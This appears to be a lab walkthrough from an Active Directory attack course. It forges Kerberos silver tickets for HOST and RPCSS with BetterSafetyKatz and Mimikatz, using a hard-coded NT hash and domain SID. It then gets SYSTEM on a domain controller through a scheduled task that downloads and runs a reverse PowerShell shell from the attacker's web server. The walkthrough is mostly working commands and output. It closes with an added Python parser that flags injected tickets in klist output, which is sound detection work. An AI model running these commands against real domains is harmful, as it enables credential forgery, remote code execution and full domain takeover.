Obj 9 Silver Ticket for Host

Task: Get command execution on the DC by creating a silver ticket for the HOST service, and then for WMI.

Run one of the following commands from an elevated shell:

Silver Ticket - BetterSafetyKatz

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Silver Ticket - Mimikatz

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Start a netcat listener on the student VM:

nc64.exe -lvnp 443

We need to run a modified reverse PowerShell script:

Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.
- Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (right-click on it and click Edit).
- Add Power -Reverse -IPAddress 172.16.100.X -Port 443 to the end of the file.

Remember to serve this newly created file with HFS.exe or a similar web server.

Now, let's create a scheduled task on the DC that downloads and runs our new script:

schtasks /create /S dcorp-dc /SC Weekly /RU "NT Authority\SYSTEM" /TN "UserX" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/Invoke-PowerShellTcpEx.ps1''')'"

Now we can run the task to execute our script:

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "UserX"

We should get a callback on our listener as NT AUTHORITY\SYSTEM:

PS C:\Windows\system32> hostname
dcorp-dc
PS C:\Windows\system32> whoami
nt authority\system

- PART 2 - This achieves the same result as above by a different route.

To access WMI, we need to create two tickets: one for the HOST service and another for RPCSS. Run the commands below from an elevated shell:

Create Silver Ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Inject a ticket for RPCSS

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:1e16be70054d1c5999aa53994e03e59c /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Check that both tickets are present in the cache:

klist

#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: RPCSS/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 11/16/2021 13:36:23 (local)
        End Time: 11/16/2021 23:36:23 (local)
        Renew Time: 11/23/2021 13:36:23 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

#1>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: HOST/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local

Now we can run WMI commands against the DC:

PS C:\AD\Tools> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
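From the defender's side, the klist output above carries two tell-tale marks of an injected ticket: the Kdc Called field is empty, because the ticket was forged on the client and never issued by the DC, and the ticket is RC4-encrypted because it was built from the NT hash. The following Python parser, added here and not part of the lab material, reads klist output of that shape (the sample entries are constructed) and flags such cache entries for triage:

```python
import re

# Constructed sample shaped like the klist output above: entry #0 is the injected
# RPCSS ticket (RC4, no KDC contacted); entry #1 is a normal TGT from the DC.
SAMPLE_KLIST = """\
#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: RPCSS/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 11/16/2021 13:36:23 (local)
        Kdc Called:

#1>     Client: student @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 11/16/2021 13:00:00 (local)
        Kdc Called: dcorp-dc.dollarcorp.moneycorp.local
"""
ENTRY_START = re.compile(r"^#(\d+)>\s*(.*)$")
FIELD = re.compile(r"^\s*([A-Za-z][A-Za-z ]*?):\s*(.*?)\s*$")  # 'Name: value'


def parse_klist(text):
    """Return one dict per cached ticket, keyed by the klist field names."""
    tickets, current = [], None
    for line in text.splitlines():
        m = ENTRY_START.match(line)
        if m:                                  # '#n>' opens a new ticket entry
            current = {"index": int(m.group(1))}
            tickets.append(current)
            line = m.group(2)                  # first field shares that line
        f = FIELD.match(line) if current is not None else None
        if f:
            current[f.group(1)] = f.group(2)
    return tickets


def suspicious_tickets(tickets):
    """Flag cached tickets that show the marks of a forged, injected ticket."""
    findings = []
    for t in tickets:
        reasons = []
        if not t.get("Kdc Called"):            # /ptt injection: no KDC ever issued it
            reasons.append("no KDC contacted")
        if "RC4" in t.get("KerbTicket Encryption Type", ""):
            reasons.append("RC4-encrypted ticket")  # forged from an NT hash; AES expected
        if reasons:
            findings.append((t["index"], t.get("Server", ""), reasons))
    return findings
```

An empty Kdc Called is the stronger signal; RC4 alone is only weak evidence in domains where RC4 is still permitted for service tickets.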
